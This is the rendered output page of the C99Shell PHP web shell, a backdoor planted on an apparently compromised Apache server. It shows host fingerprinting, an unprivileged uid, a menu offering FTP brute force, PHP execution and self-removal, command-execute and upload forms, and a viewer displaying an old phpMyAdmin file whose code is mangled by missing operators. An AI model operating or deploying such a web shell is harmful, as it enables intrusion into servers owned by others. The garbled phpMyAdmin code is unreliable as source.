!C99Shell v. 1.0 pre-release build #13!

Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a 

uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 

uid=99(nobody) gid=98(nobody) groups=98(nobody) 

Safe-mode: OFF (not secure)

/home/makras/public_html/db_admin/   drwxr-xr-x
Free 318.37 GB of 458.09 GB (69.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     db_details_links.php (2.12 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* $Id: db_details_links.php,v 2.1 2003/11/22 20:51:45 garvinhicking Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:


/**
 * Counts amount of navigation tabs
 */
$db_details_links_count_tabs 0;


/**
 * If coming from a Show MySQL link on the home page,
 * put something in $sub_part
 */
if (empty($sub_part)) {
    
$sub_part '_structure';
}


/**
 * Prepares links
 */
// Export link if there is at least one table
if ($num_tables 0) {
    
$lnk3 'db_details_export.php';
    
$arg3 $url_query;
    
$lnk4 'db_search.php';
    
$arg4 $url_query;
}
else {
    
$lnk3 '';
    
$arg3 '';
    
$lnk4 '';
    
$arg4 '';
}
// Drop link if allowed
if (!$cfg['AllowUserDropDatabase']) {
    
// Check if the user is a Superuser
    
$links_result                 = @PMA_mysql_query('USE mysql');
    
$cfg['AllowUserDropDatabase'] = (!PMA_mysql_error());
}
if (
$cfg['AllowUserDropDatabase']) {
    
$lnk5 'sql.php';
    
$arg5 $url_query '&amp;sql_query='
          
urlencode('DROP DATABASE ' PMA_backquote($db))
          . 
'&amp;zero_rows='
          
urlencode(sprintf($strDatabaseHasBeenDroppedhtmlspecialchars(PMA_backquote($db))))
          . 
'&amp;goto=main.php&amp;back=db_details' $sub_part '.php&amp;reload=1&amp;purge=1';
    
$att5 'class="drop" '
          
'onclick="return confirmLink(this, \'DROP DATABASE ' PMA_jsFormat($db) . '\')"';
}
else {
    
$lnk5 '';
}


/**
 * Displays tab links
 */

if ($cfg['LightTabs']) {
    echo 
'&nbsp;';
} else {
    echo 
'<table border="0" cellspacing="0" cellpadding="3" width="100%" class="tabs">
    <tr>
        <td width="8">&nbsp;</td>'
;
}

echo 
PMA_printTab($strStructure'db_details_structure.php'$url_query);
echo 
PMA_printTab($strSQL'db_details.php'$url_query '&amp;db_query_force=1');
echo 
PMA_printTab($strExport$lnk3$arg3);
echo 
PMA_printTab($strSearch$lnk4$arg4);
echo 
PMA_printTab($strQBE, ($num_tables 0) ? 'db_details_qbe.php' ''$url_query);

// Displays drop link
if ($lnk5) {
   echo 
PMA_printTab($strDrop$lnk5$arg5$att5);
// end if
echo "\n";

if (!
$cfg['LightTabs']) {
    echo 
'</tr></table>';
} else {
    echo 
'<br />';
}
?>
<br />

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0047 ]--